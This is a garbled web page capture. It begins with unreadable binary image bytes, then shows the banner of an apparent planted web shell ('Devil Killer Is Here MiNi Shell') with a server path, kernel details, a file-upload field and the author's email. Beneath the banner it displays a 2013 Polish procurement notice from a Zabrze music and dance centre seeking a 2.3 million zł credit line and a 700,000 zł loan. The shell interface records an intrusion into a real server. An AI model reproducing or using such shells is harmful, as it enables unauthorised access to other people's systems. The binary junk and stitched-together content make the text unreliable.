JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131118/242817-N-2013.html

<p class="kh_header"><b>Zabrze: Usługa finansowa polegająca na udzieleniu:
Część 1 - kredytu obrotowego w kwocie 2.300.000,00 zł,
Część 2 - pożyczki w kwocie 700.000,00 zł
z przeznaczeniem na wkład własny do projektu pn.: Poprawa jakości oferty kulturalnej oraz zwiększenie dostępu do kultury poprzez poprawę stanu infrastruktury Domu Muzyki i Tańca w Zabrzu w ramach Programu Konserwacja i Rewitalizacja Dziedzictwa Kulturowego - Mechanizm Finansowy Europejskiego Obszaru Gospodarczego 2009-2014 i Norweskiego Mechanizmu Finansowego 2009-2014</b><br>
<b>Numer ogłoszenia: 242817 - 2013; data zamieszczenia: 18.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Muzyki i Tańca , ul. Gen. de Gaulle`a 17, 41-800 Zabrze, woj. śląskie, tel. 032 2715641, faks 032 2715644.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dmit.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa finansowa polegająca na udzieleniu:
Część 1 - kredytu obrotowego w kwocie 2.300.000,00 zł,
Część 2 - pożyczki w kwocie 700.000,00 zł
z przeznaczeniem na wkład własny do projektu pn.: Poprawa jakości oferty kulturalnej oraz zwiększenie dostępu do kultury poprzez poprawę stanu infrastruktury Domu Muzyki i Tańca w Zabrzu w ramach Programu Konserwacja i Rewitalizacja Dziedzictwa Kulturowego - Mechanizm Finansowy Europejskiego Obszaru Gospodarczego 2009-2014 i Norweskiego Mechanizmu Finansowego 2009-2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 zamówienia polega na udzieleniu Zamawiającemu i obsłudze kredytu w wysokości do kwoty 2.300.000,00 zł, przeznaczonego na zapłatę kwoty podatku od towarów i usług (VAT), stanowiącego wkład własny Zamawiającego do projektu pn.: Poprawa jakości oferty kulturalnej poprzez poprawę stanu infrastruktury Domu Muzyki i Tańca w Zabrzu w ramach programu Konserwacja i Rewitalizacja Dziedzictwa Kulturowego - Mechanizm Finansowy Europejskiego Obszaru Gospodarczego  2009-2014 i Norweskiego Mechanizmu Finansowego 2009-2014.

Część 2 zamówienia polega na udzieleniu Zamawiającemu pożyczki w wysokości 700.000,00 zł z przeznaczeniem na wkład własny do projektu pn.: Poprawa jakości oferty kulturalnej oraz zwiększenie dostępu do kultury poprzez poprawę stanu infrastruktury Domu Muzyki i Tańca w Zabrzu w ramach Programu Konserwacja i Rewitalizacja Dziedzictwa Kulturowego - Mechanizm Finansowy Europejskiego Obszaru Gospodarczego 2009-2014 i Norweskiego Mechanizmu Finansowego 2009-2014.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5, 66.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) dla części 1 zamówienia - posiadanie przez Wykonawcę zezwolenia Komisji Nadzoru Bankowego na utworzenie banku zgodnie z ustawą z dnia 29 sierpnia 1997 r. Prawo bankowe (t.j.: Dz. U. z 2012 r., poz. 1376 z późn. zm.), a w przypadku banków utworzonych przed 1998 r. - zgody Prezesa Narodowego Banku Polskiego na utworzenie banku lub innego dokumentu uprawniającego do podjęcia działalności gospodarczej w zakresie udzielania kredytów;
2) dla części 2 zamówienia - Zamawiający odstępuje od opisu sposobu dokonania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) dla części 1 - Zamawiający odstępuje od opisu sposobu dokonania oceny spełniania tego warunku,
2) dla części 2 - w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawca wykonał lub wykonuje co najmniej 2 usługi polegające na udzieleniu pożyczki w kwocie nie mniejszej niż 600.000,00 zł każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonania oceny spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>dla części 2 zamówienia Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej 2 usługi polegające na udzieleniu pożyczki w kwocie nie mniejszej niż 600.000,00 zł każda;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla części 1 zamówienia Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach:
1) zmniejszenia marży kredytu o kwotę zaakceptowaną przez obie strony,
2) zmiany terminu wykorzystania kwoty kredytu z uwagi na przedłużenie terminu, w którym środki te będą potrzebne celem wykorzystania w ramach projektu - stosownie do potrzeby wykorzystania środków w ramach tego projektu,
3) zmiany terminu rozpoczęcia spłat rat kredytu, jeżeli środki finansowe Zamawiającego uniemożliwią należyte wywiązanie się z tego zobowiązania - o okres umożliwiający Zamawiającemu należyte wykonanie zobowiązania z umowy kredytu,
4) wystąpienia siły wyższej, tj. wydarzenia nieprzewidywalnego i pozostającego poza kontrolą stron umowy, występującego po podpisaniu umowy, a powodującego niemożliwość wywiązania się z umowy - w zakresie umożliwiającym stronom należyte wykonanie zobowiązań stosownie do okoliczności danego przypadku siły wyższej.
Dla części 2 zamówienia Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach:
1) zmniejszenia marży pożyczki o kwotę zaakceptowaną przez obie strony,
2) zmiany terminu wykorzystania kwoty pożyczki z uwagi na przedłużenie terminu, w którym środki te będą potrzebne celem wykorzystania w ramach inwestycji - stosownie do potrzeby wykorzystania środków w ramach tej inwestycji,
3) zmiany terminu rozpoczęcia spłat rat pożyczki, jeżeli środki finansowe Zamawiającego uniemożliwią należyte wywiązanie się z tego zobowiązania - o okres umożliwiający Zamawiającemu należyte wykonanie zobowiązania z umowy pożyczki,
4) wystąpienia siły wyższej, tj. wydarzenia nieprzewidywalnego i pozostającego poza kontrolą stron niniejszej umowy, występującego po podpisaniu umowy, a powodującego brak możliwości wywiązania się z umowy - w zakresie umożliwiającym stronom należyte wykonanie zobowiązań stosownie do okoliczności danego przypadku siły wyższe.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dmit.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Muzyki i Tańca
ul. Gen. de Gaullea 17, 41-800 Zabrze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2013 godzina 10:00, miejsce: sekretariat Domu Muzyki i Tańca
ul. Gen. de Gaullea 17, 41-800 Zabrze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje, że zamówienie jest związane z projektem finansowanym ze środków pochodzących z budżetu Unii Europejskiej oraz z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa finansowa polegająca na udzieleniu:
Część 1 - kredytu obrotowego w kwocie 2.300.000,00 zł,
z przeznaczeniem na wkład własny do projektu pn.: Poprawa jakości oferty kulturalnej oraz zwiększenie dostępu do kultury poprzez poprawę stanu infrastruktury Domu Muzyki i Tańca w Zabrzu w ramach Programu Konserwacja i Rewitalizacja Dziedzictwa Kulturowego - Mechanizm Finansowy Europejskiego Obszaru Gospodarczego 2009-2014 i Norweskiego Mechanizmu Finansowego 2009-2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Udzielenie Zamawiającemu i obsługa kredytu w wysokości do kwoty 2.300.000,00 zł, przeznaczonego na zapłatę kwoty podatku od towarów i usług (VAT), stanowiącego wkład własny Zamawiającego do projektu pn.: Poprawa jakości oferty kulturalnej poprzez poprawę stanu infrastruktury Domu Muzyki i Tańca w Zabrzu w ramach programu Konserwacja i Rewitalizacja Dziedzictwa Kulturowego - Mechanizm Finansowy Europejskiego Obszaru Gospodarczego  2009-2014 i Norweskiego Mechanizmu Finansowego 2009-2014.
Środki powinny być postawione do dyspozycji Zamawiającego w całości lub części (transzami) na rachunek i w terminach wskazanych przez Zamawiającego, każdorazowo na podstawie pisemnej dyspozycji złożonej najpóźniej na 7 dni przed terminem wypłaty.
Spłata kapitału nastąpi ratami, każdorazowo w ciągu 7 dni od otrzymania z Urzędu Skarbowego zwrotu podatku od towarów i usług związanego z projektem, w kwocie równej zwracanej kwocie podatku.
Odsetki będą spłacane miesięcznie, ostatniego dnia miesiąca, z dołu, na podstawie zawiadomienia Wykonawcy o wysokości naliczonych odsetek, które powinno wpłynąć 
do Zamawiającego w terminie co najmniej 15 dni przed datą ich płatności. Jeżeli data spłaty odsetek przypadnie na sobotę lub dzień ustawowo wolny od pracy, wpłata nastąpi w najbliższym dniu roboczym.
Oprocentowanie kredytu będzie naliczane od wykorzystanej kwoty kredytu obrotowego, tj. przekazanej na rachunek bankowy wskazany przez Zamawiającego,	według zmiennej stopy procentowej, na podstawie stawki referencyjnej WIBOR 3M powiększonej o oferowaną marżę Wykonawcy, przy czym oprocentowanie będzie naliczane na podstawie stawki WIBOR 3M z ostatniego dnia roboczego miesiąca poprzedzającego uruchomienie pierwszej transzy środków, a następnie oprocentowanie będzie ulegać zmianom w okresach miesięcznych według notowań stawki WIBOR 3M ustalanej na ostatni dzień roboczy miesiąca. Przez cały okres obowiązywania umowy marża nie może zostać podwyższona.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa finansowa polegająca na udzieleniu:
Część 2 - pożyczki w kwocie 700.000,00 zł
z przeznaczeniem na wkład własny do projektu pn.: Poprawa jakości oferty kulturalnej oraz zwiększenie dostępu do kultury poprzez poprawę stanu infrastruktury Domu Muzyki i Tańca w Zabrzu w ramach Programu Konserwacja i Rewitalizacja Dziedzictwa Kulturowego - Mechanizm Finansowy Europejskiego Obszaru Gospodarczego 2009-2014 i Norweskiego Mechanizmu Finansowego 2009-2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie polega na udzieleniu Zamawiającemu pożyczki w wysokości 700.000,00 zł z przeznaczeniem na wkład własny do projektu pn.: Poprawa jakości oferty kulturalnej oraz zwiększenie dostępu do kultury poprzez poprawę stanu infrastruktury Domu Muzyki i Tańca w Zabrzu w ramach Programu Konserwacja i Rewitalizacja Dziedzictwa Kulturowego - Mechanizm Finansowy Europejskiego Obszaru Gospodarczego 2009-2014 i Norweskiego Mechanizmu Finansowego 2009-2014.
Środki postawione będą do dyspozycji Zamawiającego w całości lub części (transzami) na rachunek i w terminach wskazanych przez Zamawiającego, każdorazowo na podstawie pisemnej dyspozycji złożonej najpóźniej na 7 dni przed terminem wypłaty. 
Spłata kapitału nastąpi miesięcznie do dnia 30.09.2018 r.
Spłata odsetek nastąpi miesięcznie, ostatniego dnia miesiąca, z dołu, na podstawie zawiadomienia Wykonawcy o wysokości naliczonych odsetek, które powinno wpłynąć 
do Zamawiającego w terminie co najmniej 15 dni przed datą ich płatności. Jeżeli data spłaty odsetek przypadnie na sobotę lub dzień ustawowo wolny od pracy, wpłata nastąpi w najbliższym dniu roboczym. Odsetki będą naliczane od wykorzystanej kwoty pożyczki, tj. przekazanej na rachunek bankowy wskazany przez Zamawiającego, według zmiennej stopy procentowej, na podstawie stawki referencyjnej WIBOR 3M powiększonej o oferowaną marżę Zamawiającego, przy czym oprocentowanie będzie naliczane na podstawie stawki WIBOR 3M z ostatniego dnia roboczego miesiąca poprzedzającego uruchomienie pierwszej transzy środków, a następnie oprocentowanie będzie ulegać zmianom w okresach miesięcznych według notowań stawki WIBOR 3M ustalanej na ostatni dzień roboczy miesiąca. Przez cały okres obowiązywania umowy marża nie może zostać podwyższona.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com